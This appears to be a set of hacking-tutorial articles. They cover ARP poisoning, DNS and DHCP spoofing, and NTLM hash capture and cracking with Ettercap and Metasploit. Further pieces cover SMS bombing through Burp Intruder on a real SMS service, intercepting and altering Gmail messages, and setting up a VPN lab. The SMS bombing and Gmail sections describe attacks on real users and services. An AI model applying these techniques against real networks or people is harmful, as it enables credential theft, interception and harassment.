Comprehensive Guide on Sniffing

ARP Protocol

The Address Resolution Protocol (ARP) is a communication protocol. It is used for discovering the link layer address associated with a given Internet layer address, a critical function in the Internet protocol suite. ARP was defined by RFC 826 in 1982 and is Internet Standard STD 37. ARP is also the name of the program for manipulating these addresses in most operating systems.

ARP is used for mapping a network address (e.g. an IPv4 address) to a physical address like a MAC address. For more details visit here.

Requirement:

  1. Kali Linux Machine
  2. Windows Machine
  3. Local Area Network
  4. EtterCap tool
  5. VM running Metasploitable
  6. Wireshark (Protocol Analyzer)
  7. XArp tool
  8. FTP Client
  9. Putty Client

ARP Protocol Process

Address Resolution Protocol is in many ways similar to a domain name service (DNS). As DNS resolves known domain names to an unknown IP address, similarly an ARP resolves known IP addresses to unknown MAC addresses. As shown below in the given image

If we observe by the above image; IP address 192.168.1.102, wants to communicate to IP address 192.168.101, but does not know its physical (MAC) address. An ARP request is broadcasted to all systems within that network, including IP X.X.X.100, X.X.X.101, and X.X.X.103. When IP address X.X.X.101 receives the message, it replies back via uni-cast with an ARP reply. This response contains the physical (MAC) address of BB-BB-BB-BB-BB-BB as shown above, this ARP reply information is then placed in the ARP cache and held there for a short duration, to reduce the amount of ARP traffic on the network, The ARP cache stores the IP, MAC, and a timer for each entry. The timer’s duration may vary depending upon the Operating system in use, i.e., Windows operating system may store the ARP cache information for 2 minutes compared to a Linux machine which may retain it for 15 minutes or so.

Let us now begin with exploiting the ARP protocol to our advantage!!!

Scenario: Let us take the below scenario, where we will use 2 windows host machines Representing Host A and Host B as Victim and Kali Linux Host C used to target the victims. In the following image, you can see attacker has lunch arp poisoning attack which has poisoned the arp table by adding attacker Mac address with both Host’s IP: A & B.

Let’s Begin the ARP Poisoning Attack

The First step is to clear the ARP Cache of both the host by typing following command in command prompt arp -d for Host A, then Ping the Host A for the reply, now type command arp -a, this will show you the physical (MAC) address of the Host A Machine.

Similarly, let us do the same activity on the other systems which is Host B

Start Sniffing with Ettercap

Let us now start to exploit both Host A and Host B, from Host C machine, which is our Kali Linux, start sniffing with Ettercap tool as shown in the below image on Kali.

Go to Sniff and select Unified sniffing

Select the Network interface as appropriate, in this case, it is eth0, click on OK

Now go to the Hosts Tab and Select Scan for Hosts as shown below to scan the connected system in a local network.

You will get the host list of all the scan hosts as shown below, let us now select our Targets from the host list X.X.X.101 and X.X.X.102, now add both the targets one by one by clicking on the tab Add to Target 1 and 2 respectively, from the given image we can see that both the targets are now added to our list.

Now go to MitM (Man in the middle) and select ARP Poisoning. A Dialog box will appear for optional parameters.

Check the box “Sniff remote connection” and click OK

Go to start tab and click on start sniffing to target the Host A and B added.

Now let us go to our Kali machine and open the terminal, let us now type command ifconfig to determine our IP address and physical (MAC) address, in our case it is 00:0c:29:5b:8e:18 as highlighted in the given image

Since we have started the arp poisoning attack on both the victim machine X.X.X.101 and 102 from our Kali machine, if we go to any host and type arp -a on the command prompt, you will clearly see that the physical (MAC) address of the victim machine has changed to the physical (MAC) address of the Kali machine, as shown above, Physical (MAC) address of both the IP X.X.X.102 and X.X.X.107 are same, which means that all the traffic from host X.X.X.102 is passing through Kali machine X.X.X.107

Demonstrate MITM with Wireshark

Let us now Open Wireshark on our Kali machine and analyze the packets, let us filter the packets by typing the following command  ICMP && (eth.sec = = 00:0c:29:5b:8e:18 || eth.dst == 00:0c:29:5b:8e:18), here in the command eth.sec means (Ethernet source) and eth.dst means (Ethernet destination), the MAC address are common in both source and destination which is the physical MAC address of our Kali machine, what we see is the source IP X.X.X.102 and destination X.X.X.101 are getting captured by the Kali machine which has a Physical (MAC) address 00:0c:29:5b:8e:18, hence proving  successful sniffing of the victim machine.

Combining DNS Spoofing with sniffing

Let us now exploit both of our victim machines with DNS Spoofing attack

From your Kali machine go to the path: /root/etc/ettercap/etter.dns, open the file and remove any content if available, after then type the value * A (your Kali Linux IP address) as shown below and save the file.

Next step is to go to the ettercap tool and select plugins and click on manage the plugins as shown below:

Now select dns_spoof plug-in, once selected you will see (*) sign on the said plug-in.

Now if from the victim machine we type the command ping www.google.com, you will observe that the reply is getting received from IP X.X.X.107 which is the IP for our Kali machine, which means that the Kali machine has become the DNS server for the victim machine.

Let us now add one more plug-in the same way we added dns_spoofing plug-in, this time we will use remote browser plug-in as shown in the image below. Once this plug-in gets added, you can capture all the browser activity performed by the victim on his browser including user name and passwords.

Capturing NTLM passwords

Open Kali terminal and type msfconsole, once the console starts to type: search http_ntlm, now type: use auxiliary/server/capture/http_ntlm as shown in the below image:

This module attempts to quietly catch NTLM/LM Challenge hashes.

Now according to the above trap set for the victim, this module will capture NTLM password of victim’s system when he will open any http web site on his browser which will redirect that web site on attacker’s IP.

From given below image you can notice victim is trying to browse “IMDb.com” on his web browser but it requires authentication which is requesting for his username and password. Now if he tries to open something else let says google.com there also it will ask username and password for authentication until the victim will not submit his username and password he cannot browse anything on his web browser.

As the victim enter username and password, the attacker at background will capture NTLM hash on his system.

Great!! The attacker had captured NTMLv2 hash; now let count detail apart from the hash value that the attacker has captured.

From the given image you can see that the attacker has captured two things more:

  • Username: raj
  • Machine name: WIN-1GKSSJ7D2AE

Now use john the ripper to crack the ntlmv2 hash by executing given below command

From given below image you can confirm, we have successfully decoded the captured hashes with the user name as raj and password as 123.

Combining DHCP Spoofing with sniffing

DHCP spoofing: A fake DHCP server is set up by an attacker in a local network, which broadcast a large number Request message of false IP configuration to genuine Client.

Go to ettercap and click on MitM, select DHCP spoofing

Form the below image, provide the necessary information

  • IP Pool – 168.0.200-210 (put an IP range to issue IP to the system connected to the network, this will work as DHCP server)
  • Net-mask 255.255.0 (as per the IP Class)
  • DNS Server IP 168.0.1 (as per the IP Class)

Click OK and Start sniffing

Here I have turned on the “metasploitable server” given below image shows the IP 192.168.0.202 which is from the pool of IP range we provided on ettercap DHCP.

Let us now go to the client machine and try to connect the metasploitable server with FTP (File Transfer Protocol) client as shown in the below image

Provide the hostname (IP), user name and password to connect to the FTP server.

From the given below image, we can see that, the information such as username and password for FTP is getting captured by ettercap provided by the host machine, in our case it is User:msfadmin, PASS:msfadmin

From given below image you can perceive that now we are trying to connect with metasploitable server (192.168.0.202) through telnet via port 23 using putty. it will prompt you for the user name and password, provide the necessary information.

From the above image, we can clearly see that ettercap has captured the credential information been provided by the user in our case it is User:msfadmin Pass: msfadmin for telnet service.

HTTP Password Sniffing

Let us now do the same through HTTP (Hypertext Transfer Protocol)

From the below image, we can see DVWA service is running in our metasploitable server, through the client browser let us type 192.168.0.202/dvwa/login.php, it will prompt for username and password, let’s provide the credentials.

We could see from the below image, ettercap has once again captured the username and password been provided by the user from the browser, in our case, it is username: admin and PASS: password for HTTP service.

SMTP Password Sniffing

Lastly, let us now try this with SMTP (Simple Mail Transport Protocol) Sniffing.

The first step is to configure SMTP Server in your environment please click Here as to how we can configure an SMTP server in windows machine.

Once the Server is configured, and we have set up email clients on the target machines,

Let us open Ettercap and add both our Targets X.X.X.102 and X.X.X.104 and select ARP poisoning

Now let us send an email from Target A to Target B as shown below

Here target A: [email protected] is sender who is sending the message to target B: [email protected]  and hence port 25 for SMTP service will get in action.

Given below image has confirmed that Aarti has received raj’s mail successfully, while at background attacker is sniffing all the traffic passes through the router.

If we now go to Ettercap console, we can clearly see that it has successfully sniffed the traffic between Target A and Target B and captured the credential of Target A (Raj) as shown in above image.

Capture Email of SMTP server with Wireshark

Go to wire shark are put the filter smtp && (eth.src == 00:0c:29:4a:47:75 || eth.dst == 00:0c:29:4a:47:75) the MAC address filter is for our kali machine, you will observe it has captured packets from both our target Machines.

It has sniff every all SMTP packets, captured both email IDs i.e. sender and receiver with message been sent to Target B which is Hello Friends today we are performing SMTP sniffing, which shows that we have been successful on our attack on the selected targets, as shown in the image below.

Throughout this article, we discussed ways and techniques that can be used to exploit the Arp protocol successfully, let us now discuss briefly around the technique to be used to detect the arp attack.  

ARP Attack Detection                

There are various tools available to detect the arp attack, one of the most common tools is XArp tool, which we will be using for this article.

We can run this tool in any host machine in the network to detect the arp attack, above image shows the affected systems on the network highlighted in red (X), we can disconnect these host from the network and decide upon next course of action to mitigate these risk by implementing the following controls:

  1. Dynamic address inspection
  2. DHCP snooping
  3. VLAN hopping prevention

Author: Krishnan Sharma is a technology professional having the passion for information security and related fields, he loves technical writing and is part of our hacking article team, he may be contacted Here

SMS Bombing on Mobile using Burpsuite

In this article we will learn about SMS bombing. It is used to prank your friends by sending those hundreds and thousands of SMS at once. There are many third-party sites to do so but there are usually of no use. We are introducing a different method to do so and all you need is you, Kali.

We are going to use BurpSuite that means we have to set up proxy first. And for that go to browser settings and select Preferences.

Then select an advanced option and then go to network settings.

A dialogue box will open and from it select Manual Proxy Configuration. As you have selected this, you can either keep the http proxy as localhost or you can set it to 127.0.0.1

Now that proxy has been set up open BurpSuite.

Now select the proxy tab and then the options tab and check the checkbox of the interface. Then click on the Edit button on the left side.

It will open a dialogue box. In this select Support invisible proxying option. Click on OK.

When you return to the previous window check the invisible box too.

As of now, all the settings have been done. Now what we need is to send the message and for that, we will log in to way2sms.com.

After logging in generate the message and give the contact number to which you want to send the messages. Before clicking on send turn on the interception in BurpSuite.

When you click the send button the request will first go to Burpsuite as it captures the traffic. When the traffic has been captured right-click anywhere and select Send to intruder option or simply use keyboard shortcut i.e. ctrl+i.

Now in the intruder tab select options tab. It will show you the details of the traffic that is the number to which the SMS was destined to and the text message.

Select the part of the text message and click on add.

Now go to Payloads tab and select Brute Force in the Payload type option.

Then give the character set of 123456789 i.e. 1-9 numbers. And give the minimum length of 1 and the maximum length of 3. Here, minimum and maximum length means the length of digits that will be created using character set. From the customization that we have done, it will create 1100 messages for the receiver.

Now finally to start the attack goes to the intruder menu and select Start Attack from the drop-down menu.

Once the attack starts you can see that the receiver will start receiving all the messages in the interval of 1 to 5 seconds as shown in the image below:

I stopped the attack after 29 messages which were sent in the time span of 1 to 2 minutes.

Author: Shivam Gupta is An Ethical HackerCyber Security Expert, Penetration Tester, India. you can contact here

Hijacking Gmail Message on Air using Burpsuite

There are various vibrant attacks of burpsuite that may not know off; therefore we will try one for those in this article today. We will learn how to get between the networks of Gmail and then to change the message o the mail before it reaches the receiver.

First of all, go to the terminal of Kali and type:

Here,

-i –> interface

wlan0 –> network (This can be either Ethernet or WLAN depending on your victim i.e. if your victim is using eth0 then you should also use eth0)

-t –> target

192.168.100.4 –> Victim IP

192.168.100.1 –> DNS

Execution of the above command will capture the packets that are sent from victim to router. And once we have captured these packets we will open another terminal in Kali and type the following command which will make us capture all the packets from router to victim.

Here,

-i –> interface

wlan0 –> network

-t –> target

192.168.100.1 –> DNS

192.168.100.4 –> victim IP

This command will capture packets that are sent from router to victim IP. Now type the following the command so that IP forwarding is enabled in our PC.

Then type the following the command so that all the packets on port 80 will go through our IP.

Then type the following the command so that we can all the packets on port 443 will go from our IP.

After all, this is done then open burpsuite and go to the proxy tab and then select the options tab. Once you have reached here click on Add button.

Clicking on Add button will make the following options appear. In this give port no 80 in the box adjacent to bind to a port and in specific address give your IP.

Further on, Select Request Handling tab and check Support invisible proxy. And then click on ok.

Repeat the above steps for Port no 443 too.

After clicking on ok make sure all the boxes of running and invisible are checks.

When the victim will sign in his/her Gmail account we have its data captured in burpsuite.

And all this captured data will contain username and password of the victim as shown below.

Here is the closer view to the username and password.

The victim will type and send the message without suspicion:

But as the victim will click on send button its mail will come to us before reaching the destination.

Now you can change the text of the message by a simple left click on the message area and type your message as I changed HELLO THIS IS TESTING to YOU HAVE BEEN HACKED.

Once you change the message then click on Forward button on the top left side and the mail will go forward to its destination as shown below:

Shivam Gupta is An Ethical HackerCyber Security Expert, Penetration Tester, India. you can contact here

Setup VPN Penetration Testing Lab in Server 2008

You just need to follow the basic steps for configuring a remote access virtual private network (VPN) server using Server Manager, the Add Roles Wizard, and the Routing and Remote Access Server Setup Wizard. After you finish configuring a basic remote access VPN server, you can perform additional configuration tasks on client depending on the way you want to use the remote access VPN server.

Start -> Administrative Tools -> Server Manager. Click Add Roles

This wizard helps you install roll on your server, click on next to continue

Check the status of “Network Policy Server” under Role Services and click on next.

Read the requirements and click “Next” to continue.

On the following screen “Select Role Services” for Network Policy and Access Service, place a check mark on Routing and Remote Access Services and make sure “Remote Access Service” and “Routing” are selected as well. Click next to continue.

To install following role services for Network Policy and Access Service click on Install.

This show the summary of Remote Access services and Routing were installed successfully. Once the installation finishes, click close to end the wizard.

Till here I have completed installation of VPN in server.

To complete configuration in Routing and Remote Access follow these step.

Start -> Administrative Tools ->Routing and Remote Access

In the console that opens, right click your server name and right click on “Configure and Enable Routing and Remote Access “this configures Routing and Remote Access on the selected server.

In the Wizard you can enable any of following combinations of services. I will choose Custom Configuration for my server and click on Next.

Next is Routing and Remote Access server setup wizard in which I am going to decide which type of access should be allows to client to access server network.

You can configure the selected services in the Routing and Remote Access console. I am selecting the Check Box VPN access service on this server and click on next to continue

Now you have successfully completed the task of VPN access service in your server, to close this wizard click on finish.

Now you will get the dialog box which shows message that Routing and Remote Access service is ready to use. So click on Start Service.

Once the process is finished, and you are back on the main Server Manager window, routing and remote access should now be up and running.

Once you have successfully configuration of Routing and Remote, the administrator will select the desire user and give privilege to access the server through VPN connection for connecting client from different location.

Start -> Administrative Tools -> Active Directory Users and Computers -> Right Click the properties of an user

Click on the Dial-In tab and under “Network Access Permission” select Allow Access. Click on Apply and Ok to finish. Only selected client will be able to connect with server network through VPN using different network.

This was first phase of VPN configuration on server-side performs by administrator.

SETUP VPN CONNECTION FOR CLIENT ON WINDOWS 7

 Setting up a client connection to a VPN network is very similar to setting up an old-fashioned Dial-Up connection through a phone line. You need to enter a server address (hostname or IP), user and password. Once connected, this system will receive an IP address within the VPN network, so you’ll be able to access it from any other machines also connected to the same VPN network.

Click on the Start -> Control Panel ->Network and Internet -> Network and Sharing Center

Change your network settings click on setup a new connection or network option, this contains different types of network connection options like broadband, dial-up, VPN or set up a router or access point.

Here you can many other options as I told, I will choose connect to a workplace to set a dial-up or VPN connections to your workplace. This option will set the connection to a workplace or say to our server for the client.

Now you will see next wizard for connect to workplace, which will ask for type of connection through which you will connect to your workplace or server.

My option will be use my internet connection (VPN) and the will be established using internet.

Now connecting network you must aware of IP address of workplace or say server. 192.168.0.106 it is the IP of my windows server 2008 r2 having VPN setup and configuration ,so I have mention this IP in Internet Address for connection

Now I had set privilege for user pentest to Allow Access for VPN connection. When you will try to connect it will ask for your credentials for authentication. Client will enter his username and password for establishing connection and click on connect.

When given credential will be found authorized, it will allow client to connect with workplace and provide VPN connection.

This is unshared and secure connection over internet between client and server for sharing data in a transparent medium.

To ensure that you have successful VPN connection open your command promot and type ipconfig this show another IP over LAN.

My IP is 192.168.0.104 under PPP adapter VPN connection, which will be used for login in server to access network and share data, as I am also having my LAN IP 192.168.0.105. This shows my VPN connection is established successfully.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets.